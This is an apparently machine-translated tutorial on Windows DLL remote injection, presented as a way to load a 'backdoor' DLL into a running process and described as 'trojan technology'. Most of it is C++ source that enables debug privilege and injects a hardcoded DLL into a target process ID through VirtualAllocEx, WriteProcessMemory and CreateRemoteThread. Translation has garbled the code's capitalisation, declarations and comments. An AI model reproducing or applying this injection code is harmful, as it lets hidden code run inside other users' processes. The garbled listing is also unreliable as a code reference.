DLL Remote injection instance

 

Generally, each process has its own private space. Theoretically, other processes are not allowed to operate on this private space. However, we can use some methods to enter the space and perform operationsCodeWrite to a running process, so there is a remote injection.
I have not discussed the compilation of DLL backdoors much. Now let's look at the compilation of executable files that implement the injection function:
The functions used include:

 
  Openprocesstoken ();
Lookupprivilegevalue ();
Adjusttokenprivileges ();
OpenProcess ();
Virtualallocex ();
Writeprocessmemory ();
Getprocaddress ();
Createremotethread ();
 

 

 

First, we will briefly introduce the functions of the following functions, because we need to operate other processes in the system. If we do not have sufficient system permissions, we cannot write or even read the memory addresses of other processes. Therefore, we need to improve our permissions by using the following three functions:

  Openprocesstoken ();//Enable process token
Lookupprivilegevalue ();//Returns a unique ID of the local system for system permission change.
Adjusttokenprivileges ();//It can also be seen from the English meaning that it is used to change the process permission, right?
 

 

 

 

 

Enter the memory space of the host process
After we have the permission to enter the host process space, we need to add it to its memory to load the code of our backdoor. We can use the loadlibrarya () function to load our DLL, it only needs the DLL file path. Here we want to write the DLL file path into the host's memory space, because the DLL file path does not exist in the memory space of the host process, the following functions are used:

  OpenProcess ();//Used to modify some attributes of the host process. For details, see msdn
Virtualallocex ();//File name used to apply for memory space in the host memory space to write the DLL
Writeprocessmemory ();//Write the DLL file name to the applied space
 

 

 

 

Start a new thread in the host
The loadlibrarya () function is used for loading, but the endpoint address must be known before loadlibrarya () is used. Therefore, getprocadress is used to obtain the endpoint address, with its address, you can use the createremotethread () function to start a new thread. At this time, the entire injection process is completed, but it is not very complete yet, this is left to the smart ones ;).

Simple Example:

 

  # Include  <  Windows. h  >  
# Include  <  Iostream. h  >  

  Int  Enabledebugpriv (  Const    Char     *  Name)
{
Handle htoken;
Token_privileges TP;
Luid;
  //  Open the process Ring  
  Openprocesstoken (getcurrentprocess (), token_adjust_privileges  |  Token_query,  &  Htoken );
  //  Obtain the local unique ID of a process  
 Lookupprivilegevalue (null, name,  &  Luid );

TP. privilegecount  =     1  ;
TP. Privileges [  0  ]. Attributes  =  Se_privilege_enabled;
TP. Privileges [  0  ]. Luid  =  Luid;
 //  Adjust Permissions  
  Adjusttokenprivileges (htoken,  0  ,  &  TP,  Sizeof  (Token_privileges), null, null );
  Return     0  ;
}

  // **************************************** **************************************** **************************************** *****  
  
Bool injectdll (  Const     Char     *  Dllfullpath,  Const  DWORD dwremoteprocessid)
{
Handle hremoteprocess;
Enabledebugpriv (se_debug_name );
  //  Open remote thread 
  Hremoteprocess  =  OpenProcess (process_all_access, false, dwremoteprocessid );

  Char     *  Pszlibfileremote;

  //  Use the virtualallocex function to allocate DLL file name space in the memory address space of the Remote Process  
  Pszlibfileremote  =  (  Char    *  ) Virtualallocex (hremoteprocess, null, lstrlen (dllfullpath)  +  1  , Mem_commit, page_readwrite );


  //  Use the writeprocessmemory function to write the dll path name to the memory space of the remote process.  
  Writeprocessmemory (hremoteprocess, pszlibfileremote ,(  Void     *  ) Dllfullpath, lstrlen (dllfullpath) +  1  , Null );

  //  ######################################## ######################################
  //  Calculate the loadlibrarya entry address  
  Pthread_start_routine pfnstartaddr  =  (Pthread_start_routine)
Getprocaddress (getmodulehandle (text (  "  Kernel32  " )),  "  Loadlibrarya  "  );
  //  (Getmodulehandle and getprocaddress functions)

  //  Start the remote thread loadlibrarya and create a new thread through the remote thread call.  
  Handle hremotethread;
  If  (Hremotethread  =  Createremotethread (hremoteprocess, null, 0  , Pfnstartaddr, pszlibfileremote,  0  , Null ))  =  Null)
{
Cout  <  "  Injection thread failed!  "  <  Endl;
  Return  False;
}
  // ######################################## ######################################  
  
  /*  
// The statements in // #####...... // #### can also be replaced by the following statement:
DWORD dwid;
Lpvoid pfunc = loadlibrarya;
Handle hremotethread = createremotethread (hremoteprocess, null, 0, (lpthread_start_routine) pfunc, pszlibfileremote, 0, & dwid );
// Does it feel much simpler?
  */  

  //  Release handle  
 
Closehandle (hremoteprocess );
Closehandle (hremotethread );

  Return  True;
}

  //  **************************************** **************************************** **************************************** *****  
  
  Int  Main ()
{
Injectdll (  "  C: \ zr1_zr. dll  "  , 3060  );  //  This number is the ID of the process you want to inject  
    Return     0  ;
} 

 

 

In the NT operating systems, the enabledebugpriv function implementation can be removed. Research on the trojan technology is fundamental.